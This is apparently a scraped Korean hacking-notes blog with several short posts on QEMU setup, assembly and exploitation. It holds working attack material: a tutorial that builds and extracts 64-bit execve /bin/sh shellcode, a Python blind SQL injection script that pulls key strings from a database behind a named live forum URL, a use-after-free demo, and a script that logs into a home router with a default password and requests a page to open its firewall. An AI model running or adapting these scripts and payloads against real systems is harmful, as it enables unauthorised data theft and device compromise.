2016.02.21 22:09

자꾸 놓치게 되어서 메모함.


네트워크 qemu 다운받는곳

 

https://people.debian.org/~aurel32/qemu/


관련파일 설치 하고 -> 관련 파일다운받아 아래와같이 리다이렉팅 




 #qemu-system-mips -M malta -kernel vmlinux-3.2.0-4-4kc-malta_kernel.0-4-4kc-malta -hda debian_wheezy_mips_standard.qcow2 -append "root=/dev/sda1 console=tty0" -redir tcp:2222::22 -redir tcp:8080::80 --nographic


이후 scp 로 파일전송하면 파일 이동도가능 



Posted by k1rha
2015.12.21 15:12

멍청하게 손으로 쉘코드를 일일이 치지말자 


Some assembly required

We begin our journey by writing assembly to launch a shell via the execve system call.

For backwards compatibility, 32-bit Linux system calls are supported in 64-bit Linux, so we might think we can reuse shellcode targeted for 32-bit systems. However, the execve syscall takes a memory address holding the NUL-terminated name of the program that should be executed. Our shellcode might be injected someplace that requires us to refer to memory addresses larger than 32 bits. Thus we must use 64-bit system calls.

The following may aid those accustomed to 32-bit assembly.

32-bit syscall64-bit syscall

instruction

int $0x80

syscall

syscall number

EAX, e.g. execve = 0xb

RAX, e.g. execve = 0x3b

up to 6 inputs

EBX, ECX, EDX, ESI, EDI, EBP

RDI, RSI, RDX, R10, R8, R9

over 6 inputs

in RAM; EBX points to them

forbidden

example

mov $0xb, %eax
lea string_addr, %ebx
mov $0, %ecx
mov $0, %edx
int $0x80
mov $0x3b, %rax
lea string_addr, %rdi
mov $0, %rsi
mov $0, %rdx
syscall

We inline our assembly code in a C file, which we call shell.c:

int main() {
  asm("\
needle0: jmp there\n\
here:    pop %rdi\n\
         xor %rax, %rax\n\
         movb $0x3b, %al\n\
         xor %rsi, %rsi\n\
         xor %rdx, %rdx\n\
         syscall\n\
there:   call here\n\
.string \"/bin/sh\"\n\
needle1: .octa 0xdeadbeef\n\
  ");
}

No matter where in memory our code winds up, the call-pop trick will load the RDI register with the address of the "/bin/sh" string.

The needle0 and needle1 labels are to aid searches later on; so is the0xdeadbeef constant (though since x86 is little-endian, it will show up as EF BE AD DE followed by 4 zero bytes).

For simplicity, we’re using the API incorrectly; the second and third arguments to execve are supposed to point to NULL-terminated arrays of pointers to strings (argv[] and envp[]). However, our system is forgiving: running "/bin/sh" with NULL argv and envp succeeds:

ubuntu:~$ gcc shell.c
ubuntu:~$ ./a.out
$

In any case, adding argv and envp arrays is straightforward.

The shell game

We extract the payload we wish to inject. Let’s examine the machine code:

$ objdump -d a.out | sed -n '/needle0/,/needle1/p'
00000000004004bf <needle0>:
  4004bf:       eb 0e                   jmp    4004cf <there>

00000000004004c1 <here>:
  4004c1:       5f                      pop    %rdi
  4004c2:       48 31 c0                xor    %rax,%rax
  4004c5:       b0 3b                   mov    $0x3b,%al
  4004c7:       48 31 f6                xor    %rsi,%rsi
  4004ca:       48 31 d2                xor    %rdx,%rdx
  4004cd:       0f 05                   syscall

00000000004004cf <there>:
  4004cf:       e8 ed ff ff ff          callq  4004c1 <here>
  4004d4:       2f                      (bad)
  4004d5:       62                      (bad)
  4004d6:       69 6e 2f 73 68 00 ef    imul   $0xef006873,0x2f(%rsi),%ebp

00000000004004dc <needle1>:

On 64-bit systems, the code segment is usually placed at 0x400000, so in the binary, our code lies starts at offset 0x4bf and finishes right before offset 0x4dc. This is 29 bytes:

$ echo $((0x4dc-0x4bf))
29

We round this up to the next multiple of 8 to get 32, then run:

$ xxd -s0x4bf -l32 -p a.out shellcode

Let’s take a look:

$ cat shellcode
eb0e5f4831c0b03b4831f64831d20f05e8edffffff2f62696e2f736800ef
bead


'System_Hacking' 카테고리의 다른 글

SPI 통신으로 firmware dump 뜨기  (0) 2016.02.21
QEMU 돌릴때 포트포워딩 옵션  (0) 2016.02.21
Shellcode 뽑아내는 깨알 팁.  (0) 2015.12.21
call, leave, ret assembly  (0) 2015.09.11
Android stageFright RCE exploit  (0) 2015.09.10
ARM32 netcat static compile  (0) 2015.09.02
Posted by k1rha
2015.10.24 16:20

#!/usr/bin/python


import urllib2,urllib,time

# select database()

#query = "1 and (substr((lpad(bin(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))),7,0)),1,1)=1)"

#5F5F5F5F5F5F5F5F5F5F5F5F313339313533363335

target = "select group_concat(keystr) from KeyDB.kt1509 where signature like 0x3234306136346465633530615F5F5F5F5F5F5F5F"

x = 0

answer = ""


while 1:

x +=1

ch = 0


for i in range(1,8):

url = "http://poworks.com/index.php/forum/?cid=0&show="

#att = "1 and ascii(substr((%s),%d,1))=%d"%(target,x,i)

att = "1 and (substr((select lpad( bin( ascii(substr((%s),%d,1)) ),7,0)) ,%d,1)=1)#"%(target,x,i)

att = urllib.quote(att)

url += att

req = urllib2.Request(url)

result = urllib2.urlopen(req).read()

#print result

r = result.find("No replies posted yet.")

if r > -1:

ch += 2**(7-i)

else:

pass


if ch == 0:


break


else:


answer += chr(ch)


print ":) : "+ answer



print "END : ",answer



Posted by k1rha
2015.09.15 14:03

busybox static prebuild binary


http://www.busybox.net/downloads/binaries/1.16.1/



[   ] busybox-armv4eb                                    29-Mar-2010 20:49  1.0M  
[   ] busybox-armv4l                                     29-Mar-2010 20:49  1.0M  
[   ] busybox-armv4tl                                    29-Mar-2010 20:50  1.1M  
[   ] busybox-armv5l                                     29-Mar-2010 20:50  1.1M  
[   ] busybox-armv6l                                     29-Mar-2010 20:50  1.1M  
[   ] busybox-i486                                       29-Mar-2010 20:50  878K  
[   ] busybox-i586                                       29-Mar-2010 20:50  878K  
[   ] busybox-i686                                       29-Mar-2010 20:50  878K  
[   ] busybox-mips                                       29-Mar-2010 20:50  1.6M  
[   ] busybox-mips64                                     29-Mar-2010 20:51  1.5M  
[   ] busybox-mipsel                                     29-Mar-2010 20:51  1.6M  
[   ] busybox-powerpc                                    29-Mar-2010 20:51  1.1M  
[   ] busybox-powerpc-440fp                              29-Mar-2010 20:49  1.1M  
[   ] busybox-sh4                                        29-Mar-2010 20:51  958K  
[   ] busybox-sparc                                      29-Mar-2010 20:51  1.1M  
[   ] busybox-x86_64                                     29-Mar-2010 20:51  950K  
[   ] config-busybox                                     29-Mar-2010 20:55   21K  


Posted by k1rha
2015.09.11 19:21

call =  push eip + 1frame address 

        jmp [address]  


leave =  mov esp,ebp

          pop ebp    

ret =  mov eip, [esp]  

       pop esp

'System_Hacking' 카테고리의 다른 글

QEMU 돌릴때 포트포워딩 옵션  (0) 2016.02.21
Shellcode 뽑아내는 깨알 팁.  (0) 2015.12.21
call, leave, ret assembly  (0) 2015.09.11
Android stageFright RCE exploit  (0) 2015.09.10
ARM32 netcat static compile  (0) 2015.09.02
UAF (use after free) 예제코드  (0) 2015.08.19
Posted by k1rha
2015.09.10 19:13



http://0day.today/exploit/24222


 쓸만한것들이 좀있음. 일단 저장용 


'System_Hacking' 카테고리의 다른 글

Shellcode 뽑아내는 깨알 팁.  (0) 2015.12.21
call, leave, ret assembly  (0) 2015.09.11
Android stageFright RCE exploit  (0) 2015.09.10
ARM32 netcat static compile  (0) 2015.09.02
UAF (use after free) 예제코드  (0) 2015.08.19
ARM 32bit assambly 설명 잘된 링크  (0) 2015.05.17
Posted by k1rha
2015.09.02 16:43

ARM32 netcat static compile 


nc_arm32_static


Posted by k1rha
2015.08.19 10:13

세미나용으로 만든 UAF 예제코드 



#include <iostream>

#include <stdlib.h>

#include <string.h>

#include <stdio.h>


using namespace std;

class B

{

public:

char *v1 = NULL;

virtual void foo(int a)

{

cout << "B Foo Call" << a << endl;

}

};


class D : public B

{

public:

char *buff;

void foo(int a)

{

cout << "D Foo Call " << a << endl;

}

};


class E

{

public:

char buff[24]="";

void test(int a){

cout << "E->TEST "<<endl;

}

void copy(char *v2){

memcpy(buff,v2,20);

}


};

int foo3(){

cout << "This is UNUSING FOO " <<endl;

return 0;

}

int (*funcAddr)() = foo3;

int main(int argc, char *argv[]){


char * test;

B *d,*b;

E *e;


printf("-------------------------------\n");

printf("[PRINT] UNUSING FOO function addr %x \n",&funcAddr);

printf("-------------------------------\n");

d = new D;

delete d;


e = new E;

e->copy(argv[1]);


printf("d->foo(9) call \n");

d->foo(9);





return 0;

}



Posted by k1rha
2015.07.28 20:10

SSL 통신 암호화 과정


Posted by k1rha
2015.07.12 13:33

웹세션 유지한채로 통신하기



import httplib

import urllib

import urllib2

import os 

import time

import getpass

import sys

import telnetlib


RouterIP = "192.168.123.1"



def HttpAdminLogin():

#print ":::     CONNECT ADMIN SESSION     "

loginURL2 = "http://"+RouterIP+"/ap_login.asp"

params2 = {"page":"ap_login.asp","http_passwd":"YWRtaW4=",'hidden_action':"Login"}

params2 = urllib.urlencode(params2)

try :

conn = urllib2.Request(loginURL2,params2)

conn.add_header("Content-Type","application/x-www-form-urlencoded")

response = urllib2.urlopen(conn)

cookie = response.headers.get('Set-Cookie')  ## 여기서 쿠키값을 가져옴

except :

print "CONNECTION ERROR "

return


time.sleep(1)

## iptables OPEN

print ":::     IPTABLES FIREWALL IS OPENED      "

loginURL = "http://"+RouterIP+"/test.asp"

params ={"page":"ap_login.asp","http_passwd":"YWRtaW4=",'hidden_action':"Login"}

params = urllib.urlencode(params)

try :

conn = urllib2.Request(loginURL,params)

conn.add_header("Content-Type","application/x-www-form-urlencoded")

conn.add_header("cookie",cookie)  ## 여기서 쿠기값을 저장 

response = urllib2.urlopen(conn)

except :

print "IPTABLES FIREWALL OPEN FAIL"

return 


def main():

try :

RouterIP = sys.argv[1]

except :

RouterIP = "192.168.123.1"


print ":::     Home Router IP -> " + str(RouterIP)

HttpAdminLogin()

if __name__ == "__main__":

main()



Posted by k1rha